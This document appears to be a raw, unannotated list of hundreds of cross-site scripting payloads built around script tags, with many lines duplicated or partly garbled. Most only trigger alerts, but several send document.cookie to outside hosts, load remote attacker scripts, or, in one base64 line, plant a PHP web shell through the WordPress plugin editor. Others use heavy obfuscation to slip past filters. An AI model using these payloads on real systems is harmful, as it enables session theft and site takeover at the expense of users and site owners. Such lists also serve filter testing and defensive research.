- <script>document.write(String.fromCharCode(b??WAN?));</script>
- <script>document.write(String.fromCharCode(xss));</script>
- <script>document.write(‘\u003C\u0069\u006D\u0067\u0020\u0073\u0072\u0063\u003D\u0031\u0020\u006F\u006E\u0065\u0072\u0072\u006F\u0072\u003D\u0061\u006C\u0065\u0072\u0074\u0028\u0031\u0029\u003E’);</script>
- <script>document.write(‘\x3C\x69\x6D\x67\x20\x73\x72\x63\x3D\x31\x20\x6F\x6E\x65\x72\x72\x6F\x72\x3D\x61\x6C\x65\x72\x74\x28\x31\x29\x3E’);</script>
- <SCRIPT>document.write(“XSS”);</SCRIPT>
- <SCRIPT>document.write(“XSS”);</SCRIPT>
- <script>’e1v2a3l’.replace(/(.).(.).(.).(.)/, function(match,$1,$2,$3,$4) { this[$1+$2+$3+$4](/* code to eval() */); })</script>
- <script>eval(“\141\154\145\162\164`1`”)</script>
- <script>eval(“\141\154\145\162\164`1`”)</script> // Octal escapes combined with the ES6 backtick (diacritical grave) call syntax
- <script>eval(“\61\6c\65……”);<script>
- <script>eval.call`${‘prompt\x281)’}`</script>
- <script>eval(location.hash)</script> (Firefox)
- <script>eval(location.hash.slice(1))</script>
- <script>eval(location.hash.slice(1))</script>#alert(1)
- <script>eval(location.hash.slice(1))</script>#alert(a)
- <script>eval_r(z)</script>
- <script>eval(String.fromCharCode(97,108,101,114,116,40,39,49,39,41))</script>
- <script>eval(‘\\u’+’0061'+’lert(1)’)</script>
- <script>eval(“\x61\x6c\x65\x72\x74(1)”);</script>
- <script>eval(“\x61\x6c\x65\x72\x74(1)”);</script> // Hexadecimal escapes using eval
- <script>eval(z)</script>
- <script>f=document.createElement(“iframe”);f.id=”pwn”;f.src=”/robots.txt”;f.onload=()=>{x=document.createElement(‘script’);x.src=’//bo0om.ru/csp.js’;pwn.contentWindow.document.body.appendChild(x)};document.body.appendChild(f);</script>
- <script firefox>alert(1)</script>
- <script>foo</script>
- <SCRIPT FOR=document EVENT=onreadystatechange>alert(1)</SCRIPT>
- <script for=document event=onreadystatechange>getElementById(‘safe123’).click()</script>
- <SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(1)</SCRIPT>
- <SCRIPT+FOR=document+EVENT=onreadystatechange>MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;getElementById(%22safe123%22).click=function()+{alert(Safe.get());};getElementById(%22safe123%22).click(test);</SCRIPT>#
- <SCRIPT+FOR=document+EVENT=onreadystatechange>MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;getElementById(%22safe123%22).click=function()+{confirm(Safe.get());};getElementById(%22safe123%22).click(test);</SCRIPT>#
- <script for=_ event=onerror()>alert(/@ma1/)</script><img id=_ src=>
- <script for=_ event=onerror()>confirm(/@ma1/)</script><img id=_ src=>
- <script>for((i)in(self))eval(i)(1)</script>
- <script> function b() { return Safe.get(); } alert(b({type:String.fromCharCode(99,108,105,99,107),isTrusted:true})); </script>
- <script> function b() { return Safe.get(); } alert(b({type:String.fromCharCode(99,108,105,99,107),isTrusted:true})); </script>
- <script> function b() { return Safe.get(); } alert(b({type:String.fromCharCode(99,108,105,99,107),isTrusted:true})); </script>
- <script> function b() { return Safe.get(); } confirm(b({type:String.fromCharCode(99,108,105,99,107),isTrusted:true})); </script>
- <script> function foo(elem, doc, text) { elem.onclick = function (e) { e.__defineGetter__(text[0], function () { return true }) alert(Safe.get()); }; var event = doc.createEvent(text[1]); event.initEvent(text[2], true, true); elem.dispatchEvent(event); } </script> <img src=http://www.google.fr/images/srpr/logo3w.png onload=foo(this,this.ownerDocument,this.name.split(/,/)) name=isTrusted,MouseEvent,click width=0 height=0 /> #
- <script> function foo(elem, doc, text) { elem.onclick = function (e) { e.__defineGetter__(text[0], function () { return true }) alert(Safe.get()); }; var event = doc.createEvent(text[1]); event.initEvent(text[2], true, true); elem.dispatchEvent(event); } </script> <img src=http://www.google.fr/images/srpr/logo3w.png onload=foo(this,this.ownerDocument,this.name.split(/,/)) name=isTrusted,MouseEvent,click width=0 height=0 /> #
- <script> function foo(elem, doc, text) { elem.onclick = function (e) { e.__defineGetter__(text[0], function () { return true }) alert(Safe.get()); }; var event = doc.createEvent(text[1]); event.initEvent(text[2], true, true); elem.dispatchEvent(event); } </script> <img src=http://www.google.fr/images/srpr/logo3w.png onload=foo(this,this.ownerDocument,this.name.split(/,/)) name=isTrusted,MouseEvent,click width=0 height=0 /> #
- <script> function foo(elem, doc, text) { elem.onclick = function (e) { e.__defineGetter__(text[0], function () { return true }) confirm(Safe.get()); }; var event = doc.createEvent(text[1]); event.initEvent(text[2], true, true); elem.dispatchEvent(event); } </script> <img src=http://www.google.fr/images/srpr/logo3w.png onload=foo(this,this.ownerDocument,this.name.split(/,/)) name=isTrusted,MouseEvent,click width=0 height=0 /> #
- <script> (function (o) { function exploit(x) { if (x !== null) alert(‘User cookie is ‘ %2B x); else console.log(‘fail’); } o.onclick = function (e) { e.__defineGetter__(‘isTrusted’, function () { return true; }); exploit(Safe.get()); }; var e = document.createEvent(‘MouseEvent’); e.initEvent(‘click’, true, true); o.dispatchEvent(e); })(document.getElementById(‘safe123’)); </script>
- <script> (function (o) { function exploit(x) { if (x !== null) alert(‘User cookie is ‘ %2B x); else console.log(‘fail’); } o.onclick = function (e) { e.__defineGetter__(‘isTrusted’, function () { return true; }); exploit(Safe.get()); }; var e = document.createEvent(‘MouseEvent’); e.initEvent(‘click’, true, true); o.dispatchEvent(e); })(document.getElementById(‘safe123’)); </script>
- <script> (function (o) { function exploit(x) { if (x !== null) confirm(‘User cookie is ‘ %2B x); else console.log(‘fail’); } o.onclick = function (e) { e.__defineGetter__(‘isTrusted’, function () { return true; }); exploit(Safe.get()); }; var e = document.createEvent(‘MouseEvent’); e.initEvent(‘click’, true, true); o.dispatchEvent(e); })(document.getElementById(‘safe123’)); </script>
- <script>(function() {var event = document.createEvent(%22MouseEvents%22);event.initMouseEvent(%22click%22, true, true, window, 0, 0, 0, 0, 0, false, false, false, false, 0, null);var fakeData = [event, {isTrusted: true}, event];arguments.__defineGetter__(‘0’, function() { return fakeData.pop(); });alert(Safe.get.apply(null, arguments));})();</script>
- <script>(function() {var event = document.createEvent(%22MouseEvents%22);event.initMouseEvent(%22click%22, true, true, window, 0, 0, 0, 0, 0, false, false, false, false, 0, null);var fakeData = [event, {isTrusted: true}, event];arguments.__defineGetter__(‘0’, function() { return fakeData.pop(); });confirm(Safe.get.apply(null, arguments));})();</script>
- <script>function x(window) { eval(location.hash.substr(1)) }; open(%22javascript:opener.x(window)%22)</script>#var xhr = new window.XMLHttpRequest();xhr.open(‘GET’, ‘http://xssme.html5sec.org/xssme2’, true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = ‘(.*?)’/)[1]) };xhr.send();
- <script>function x(window) { eval(location.hash.substr(1)) }; open(%22javascript:opener.x(window)%22)</script>#var xhr = new window.XMLHttpRequest();xhr.open(‘GET’, ‘http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { confirm(xhr.responseText.match(/cookie = ‘(.*?)’/)[1]) };xhr.send();
- <script>function x(window) { eval(location.hash.substr(1)) }</script><iframe id=iframe src=%22javascript:parent.x(window)%22><iframe>#var xhr = new window.XMLHttpRequest();xhr.open(‘GET’, ‘http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = ‘(.*?)’/)[1]) };xhr.send();
- <script>function x(window) { eval(location.hash.substr(1)) }</script><iframe id=iframe src=%22javascript:parent.x(window)%22><iframe>#var xhr = new window.XMLHttpRequest();xhr.open(‘GET’, ‘http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { confirm(xhr.responseText.match(/cookie = ‘(.*?)’/)[1]) };xhr.send();
- <script>history.pushState(0,0,’/i/am/somewhere_else’);</script>
- ‘“</Script><Html /Onmouseover=(alert)(1) //
- <script?=”>”?=”http://yoursite.com/xss.js?69,69"></script>
- <SCRIPT id=XSS SRC=http://127.0.0.1></SCRIPT>
- <SCRIPT id=XSS SRC=”http://xxxx.com/xss.jpg"></SCRIPT>
- <SCRIPT id=XSS SRC=http://xxxx.com/xss.js?<B>
- <SCRIPT id=XSS SRC=http://xxxx.com/xss.js></SCRIPT>
- <script>if(top!=self)top.location=location</script>
- <script>if(“x\*chr*”.length==1) { log(*num*);}</script>
- <script>if(“x\\xE0\xB9\x92”.length==2) { javascript:alert(1);}</script>
- <script>if(“x\\xE1\x96\x89”.length==2) { javascript:alert(1);}</script>
- <script>if(“x\\xEE\xA9\x93”.length==2) { javascript:alert(1);}</script>
- </script><img/*%00/src=”worksinchrome:prompt(1)”/%00*/onerror=’eval(src)’>
- </script><img/*%00/src=”worksinchrome:prompt(1)”/%00*/onerror=’eval(src)’>
- <script/img>alert(199)</script/>
- </script><img/*/src=”worksinchrome:prompt(1)”/*/onerror=’eval(src)’>
- <script+&injection=>alert(1)></script>
- <script itworksinallbrowsers>/*<script* */alert(1)</script ?
- <script itworksinallbrowsers>/*<script* */alert(1)</script
- <script itworksinallbrowsers>/*<script* */alert(1)</script
- <script itworksinallbrowsers>/*<script* */confirm(1)</script ?
- <script itworksinallbrowsers>/*<script* */confirm(1)</script
- <script>javascript:alert(1)</script>
- “`’><script>-javascript:alert(1)</script>
- <script>javascript:alert(1)</script\x0A
- <script>javascript:alert(1)</script\x0B
- <script>javascript:alert(1)</script\x0D
- <script>javascript:alert(1)<\x00/script>
- <script>//jaVasCript:/*-/*`/*\`/*’/*”/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/ — !>\x3csVg/<sVg/oNloAd=alert()//>\x3e</script>
- <script>/*jaVasCript:/*-/*`/*\`/*’/*”/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/ — !>\x3csVg/<sVg/oNloAd=alert()//>\x3e*/</script>
- ‘“”><script language=”JavaScript”> alert(‘X \nS \nS’);</script>
- ‘“”><script language=”JavaScript”> alert(‘X nS nS’);</script>
- <script language=”JavaScript”>alert(‘XSS’)</script>
- <script language=’javascript’ src=’%(jscript)s’></script>
- <SCRIPT LANGUAGE=”VBScript”>%0a%0dFunction window_onload%0a%0dAlert 1%0a%0dEnd Function </SCRIPT>
- <script language=vbs></script><img src=xx:x onerror=”::alert’ @insertScript ‘::”>
- scriptlet.html”></LAYER>
- <scriptlet> <implements type=”behavior”/><script>alert(1)</script></scriptlet>
- <script>let{location={href:’http://evil.com/ ‘}}=0;alert(location.href);</script>
- <script> location.href = ‘data:text/html;base64,PHNjcmlwdD54PW5ldyBYTUxIdHRwUmVxdWVzdCgpO3gub3BlbigiR0VUIiwiaHR0cDovL3hzc21lLmh0bWw1c2VjLm9yZy94c3NtZTIvIix0cnVlKTt4Lm9ubG9hZD1mdW5jdGlvbigpIHsgYWxlcnQoeC5yZXNwb25zZVRleHQubWF0Y2goL2RvY3VtZW50LmNvb2tpZSA9ICcoLio/KScvKVsxXSl9O3guc2VuZChudWxsKTs8L3NjcmlwdD4=’; </script>
- <script>location.href=decodeURIComponent(location.hash.slice(1));</script>
- <script>location.href=’http://127.0.0.1:8088/cookie.php?cookie='+escape(document.cookie);</script>
- <script>location.href=”http://www.evilsite.org/cookiegrabber.php?cookie="??(document.cookie)</script>
- <script>location.href;’javascript:alert(1)’</script>
- <script>location.href;’javascript:alert%281%29'</script>
- “`’><script>lo*chr*g(*num*)</script>
- <script>logChr(0)</script>
- <script> logChr0x09(1); </script>
- “‘`><script>log*chr*(*num*)</script>
- ‘/<\/?(script|meta|link|frame|iframe).*>/Uis’,
- <script>new class extends alert(1){}</script>
- <script>new class extends class extends class extends class extends alert(1){}{}{}{}</script>
- <script>new function(){new.target.constructor(‘alert(1)’)();}</script>
- <script>new Image()[unescape(‘%6f%77%6e%65%72%44%6f%63%75%6d%65%6e%74’)][atob(‘ZGVmYXVsdFZpZXc=’)][8680439..toString(30)](1)</script>
- <script>Object.defineProperties(window, {Safe: {value: {get: function() {return document.cookie}}}});alert(Safe.get())</script>
- <script>Object.defineProperties(window, {Safe: {value: {get: function() {return document.cookie}}}});confirm(Safe.get())</script>
- <script>Object.defineProperty(window, ‘Safe’, {value:{}});Object.defineProperty(Safe, ‘get’, {value:function() {return document.cookie}});alert(Safe.get())</script>
- <script>Object.defineProperty(window, ‘Safe’, {value:{}});Object.defineProperty(Safe, ‘get’, {value:function() {return document.cookie}});confirm(Safe.get())</script>
- <script>Object.__noSuchMethod__ = Function,[{}][0].constructor._(‘alert(1)’)()</script>
- <script>Object.__noSuchMethod__ = Function,[{}][0].constructor._(‘javascript:alert(1)’)()</script>
- <script/onload=confirm(1)></script>
- <script onLoad script onLoad=”javascript:javascript:alert(1)”></script onLoad>
- <script/onreadystatechange=alert(1)>
- <SCRIPT onreadystatechange=javascript:javascript:alert(1);></SCRIPT>
- <script onReadyStateChange script onReadyStateChange=”javascript:javascript:alert(1)”></script onReadyStateChange>
- <script>parent[‘alert’](1)</script>
- <script>%(payload)s</script>
- <<SCRIPT>%(payload)s//<</SCRIPT>
- <script>Promise.reject(“1”).then(null,alert)</script>
- <script>prompt(1234)</script>
- <*script>prompt(123)<*/script>
- ‘ →”>’>’”<script>prompt(198)</script>;” f0r=TRUE
- < s c r i p t > p r o m p t ( 1 ) < / s c r i p t >
- <script>prompt(1)</script>
- <script>prompt(1);</script>
- “><script>`#${prompt(1)}#`</script>
- \”><script>prompt(1)</script>
- <script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>’ →”></script>
- <script>prompt(88199)</script>
- <script>prompt.call`${1}`</script>
- <script>prompt(-[])</script>
- scriptprop={{_factory}}
- <script>ReferenceError.prototype.__defineGetter__(‘name’, function(){alert(123)}),x</script>
- <script>ReferenceError.prototype.__defineGetter__(‘name’, function(){alert(1)}),x</script>
- <script>ReferenceError.prototype.__defineGetter__(‘name’, function(){javascript:alert(1)}),x</script>
- <script>Reflect.construct(function(){new.target.constructor(‘alert(1)’)()},[])</script>
- <script/renwa~~~>;alert(1);</script/X~~~>
- <script>(()=>{return this})().alert(1)</script>
- <script>RuntimeObject(“w*”)[“window”][“alert”](1);</script>
- <script>(+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+
!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]]]+[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]])()</script>
- <script>$=~[];$={___:++$,$$$$:(![]+””)[$],__$:++$,$_$_:(![]+””)[$],_$_:++$,$_$$:({}+””)[$],$$_$:($[$]+””)[$],_$$:++$,$$$_:(!””+””)[$],$__:++$,$_$:++$,$$__:({}+””)[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+””)[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+””)[$.__$])+((!$)+””)[$._$$]+($.__=$.$_[$.$$_])+($.$=(!””+””)[$.__$])+($._=(!””+””)[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!””+””)[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+”\””+$.$_$_+(![]+””)[$._$_]+$.$$$_+”\\”+$.__$+$.$$_+$._$_+$.__+”(“+$.___+”)”+”\””)())();</script>
- </script><script>’%0A’-alert(1)//
- </script><script>alert(0x000123)</script>
- \”></script><script>alert(0x000123)</script>
- \”></sCriPt><sCriPt >alert(0x000123)</sCriPt>
- < / script >< script >alert(123)< / script >
- </script><script>alert(123)</script>
- <;/script>;<;script>;alert(1)<;/script>;
- </script><script>alert(1)</script>
- </script><script>alert(1)</script>
- </script><script >alert(document.cookie)</script>
- // →</SCRIPT><SCRIPT>alert(String.fromCharCode(88,83,83));
- ‘</script><script>alert(String.fromCharCode(88,83,83))</script>/
- ‘;</script>”>’><SCrIPT>alert(String.fromCharCode(88,83,83))</scRipt>
- ></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
- // →</SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
- “></SCRIPT>>><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
- </script><script>alert(XSS by Shawar)</script>
- </script><script>alert(��Xss��)</script>
- </script><script>alert(Xss)</script>
- </script><script>alert(‘XSS’);</script>
- </script><script>confirm(3)</script>
- </SCRIPT>”>’><SCRIPT>prompt(String.fromCharCode(88,83,83))</SCRIPT>
- </script><script>prompt(“test”)</script>
- ;<><script></script>/<script>alert(‘0’)</script>
- <</script/script><script>eval(‘\\u’+’0061'+’lert(1)’)//</script>
- </script></script><<<<script><>>>><<<script>alert(123)</script>
- </script></script><<<<script><>>>><<<script>alert(123)</script>
- </script></script><<<<script><>>>><<<script>alert(XSS)</script>
- <</script/script><script ~~~>\u0061lert(1)</script ~~~>
- </script><script>/*var a=”/*””’/**/;confirm(1);//</script>
- <script>self[‘alert’](2)</script>
- <script>({set/**/$($){_/**/setter=$,_=1}}).$=alert</script>
- <script>({set/**/$($){_/**/setter=$,_=1}}).$=confirm</script>
- <script>({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval</script>
- <script>setTimeout(‘alert(1)’,0)</script>
- <script>setTimeout(“a” + “lert” + “(1)”);</script>
- <script>setTimeout(“a” + “lert” + “(1)”);</script> // Using Basic Concatenation
- <script>setTimeout(alert(88199),0)</script>
- <script>setTimeout(/a/.source + /lert/.source + “(1)”);</script>
- <script>setTimeout(/a/.source + /lert/.source + “(1)”);</script> // Using source property for concatenation
- <script>setTimeout(location)</script>, use: <a href=”//target#
alert(1)”>CLICK</a>
- <script> … setTimeout(\”writetitle()\”,$_GET[xss]) … </script>
- (/script/.source)).src=atob(/Ly9icnV0ZWxvZ2ljLmNvbS5ici8y/.source)
- <script/src=//?.?>
- script/src=//??
- <script src=data:text/javascript,alert(88199)></script>
- <script/src=data:text/javascript,alert(1)></script> ?
- <script/src=data:text/javascript,alert(1)></script>
- <script/src=data:text/javascript,alert(1)></script>
- <script/src=data:text/javascript,alert(1)></script>
- <script src=1 href=1 onerror=”javascript:alert(1)”></script>
- <script src=’1.js’></script>
- <script src=//3334957647/1>
- <script src=”//aEa?L”></script>)
- <script src=”#”>{alert(1)}</script>;1
- <script src=//brutelogic.com.br/1>
- <script src=//brutelogic.com.br/1.js>
- <script src=//brutelogic.com.br/1.js>
- <script src=”//brutelogic.com.br/1.js#
- “><script src=//brutelogic.com.br/1.js#
- <SCRIPT SRC=//BRUTELOGIC.COM.BR/1></SCRIPT>
- <script src=”//brutelogic.com.br/1.js#
- <script src=”//brutelogic.com.br/1.js#
- “><script src=//brutelogic.com.br/1.js#
- “><script src=//brutelogic.com.br/1.js#
- <script src=/bypass/usercontent/xss.js></script>
- <script src=>confirm(8)</script>
- <script src=”data:%26comma;alert(1)//
- <script src=data:%26comma;alert(1)//
- “><script src=data:%26comma;alert(1)-”
- “><script src=data:%26comma;alert(1)//
- <script src=”data:%26comma;alert(1)%26sol;%26sol;
- <script src=data:%26comma;alert(1)%26sol;%26sol;
- <SCRIPT/SRC=DATA:,%61%6c%65%72%74%28%31%29></SCRIPT>
- <SCRIPT/SRC=DATA:,%61%6c%65%72%74%28%31%29></SCRIPT> //Cross Browser (PEPE Vila)
- <script/src=data:,alert()>
- <script src=”data:,alert(1)//
- <script src=data:,alert(1)>
- “><script src=data:,alert(1)//
- <script src=”data:,alert(1)%250A →
- <script src=data:,alert(1)></script>
- <script src=”data:,alert(64)%250A →
- <script src=data:,alert(document.cookie)></script>
- <script src=”data:;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ==”></script>
- <script/src=”data:text%2Fj\u0061v\u0061script,\u0061lert(‘\u0061’)”></script a=\u0061 & /=%2F
- <script/src=”data:text%2Fj\u0061v\u0061script,\u0061lert(‘\u0061’)”></script a=\u0061 & /=%2F
- “/><script/src=”data:text%2Fj\u0061v\u0061script,\u0061lert(‘\u0061’)”></script a=\u0061 & /=%2F
- <script/src=data:text/j\u0061v\u0061script,\u0061%6C%65%72%74(/XSS/)></script>
- <script/src=data:text/j\u0061v\u0061script,\u0061%6C%65%72%74(/XSS/)></script ????????????
- <script/src=data:text/j\u0061v\u0061script,\u0061%6C%65%72%74(/XSS/)></script
- <script/src=data:text/j\u0061v\u0061script,\u0061%6C%65%72%74(/XSS/)></script
- <script/src=data:text/j\u0061v\u0061script,\u0061%6C%65%72%74(/XSS/)></script ????????????
- <script src=”data:,alert(1)//
- “><script src=data:,alert(1)//
- <script/src=”data:,eval(atob(location.hash.slice(1)))//#alert(1)
- <script+src=data:,confirm(1)<! —
- “/><script+src=data:,confirm(1)<! —
- <script/src=”data:,eval(atob(location.hash.slice(1)))//#
- <script/src=”data:,eval(atob(location.hash.slice(1)))//##eD1uZXcgWE1MSHR0cFJlcXVlc3QoKQ0KcD0nL3dwLWFkbWluL3BsdWdpbi1lZGl0b3IucGhwPycNCmY9J2ZpbGU9YWtpc21ldC9pbmRleC5waHAnDQp4Lm9wZW4oJ0dFVCcscCtmLDApDQp4LnNlbmQoKQ0KJD0nX3dwbm9uY2U9JysvY2UiIHZhbHVlPSIoW14iXSo/KSIvLmV4ZWMoeC5yZXNwb25zZVRleHQpWzFdKycmbmV3Y29udGVudD08Pz1gJF9HRVRbYnJ1dGVdYDsmYWN0aW9uPXVwZGF0ZSYnK2YNCngub3BlbignUE9TVCcscCtmLDEpDQp4LnNldFJlcXVlc3RIZWFkZXIoJ0NvbnRlbnQtVHlwZScsJ2FwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZCcpDQp4LnNlbmQoJCk=
- <script/src=data:&p=alert(50)></script>
- <script src=data:text/html,alert(1)></script>
- <script src=data:text/html;,alert(1)></script>
- <script src=data:text/html,alert(document.cookie)></script>
- <script src=data:text/html;,alert(document.cookie)></script>
- <script src=”data:text/html;base64,YWxlcnQoMSk=”></script>
- <script src=data:text/html;base64,YWxlcnQoMSk=></script>
- <script src=”data:text/html;base64,YWxlcnQoZG9jdW1lbnQuY29va2llKQ==”></script>
- <script src=data:text/html;base64,YWxlcnQoZG9jdW1lbnQuY29va2llKQ==></script>
- <script src=”data:text/javascript,alert(1)”></script>
- <script src=data:text/javascript,alert(88199)></script>
- <SCRIPT/SRC=”DATA:TEXT/JAVASCRIPT;BASE64,YSA9CSIJCWMJCW8JCW4JCXMJCXQJCXIJCXUJCXAJCW0JKDEJ KTEJCSIJICA7IEI9W10JICA7QT0JCTIJICA7CWM9CWEJW0EJCV0JICA7QT0JCTUJICA7CW89CWEJW0EJCV0JICA7QT 0JCUEJK0EJLTEJLTEJICA7CW49CWEJW0EJCV0JICA7QT0JIEEJK0EJLTUJICA7CXM9CWEJW0EJCV0JICA7QT0JIEEJCS 0JLTMJICA7CXQ9CWEJW0EJCV0JICA7QT0JIEEJCS0JLTMJICA7CXI9CWEJW0EJCV0JICA7QT0JIEEJCS0JLTMJICA7CX U9CWEJW0EJCV0JICA7QT0JIEEJCS0JLTMJICA7CXA9CWEJW0EJCV0JICA7QT0JIEEJCS0JLTMJICA7CW09CWEJW0E JCV0JICA7QT0JIEEJCS0JLTIJICA7CUQ9CWEJW0EJCV0JICA7QT0JIEEJCS0JLTMJICA7CUU9CWEJW0EJCV0JICA7QT0 JIEEJCS0JLTEJICA7CUY9CWEJW0EJCV0JICA7IEM9ICBCW2MJK28JK24JK3MJK3QJK3IJK3UJK2MJK3QJK28JK3IJCV 0JW2MJK28JK24JK3MJK3QJK3IJK3UJK2MJK3QJK28JK3IJCV0JICA7IEMJKHAJK3IJK28JK20JK3AJK3QJK0QJK0YJK0 UJKSAJKCAJKSAJICA7"></SCRIPT>
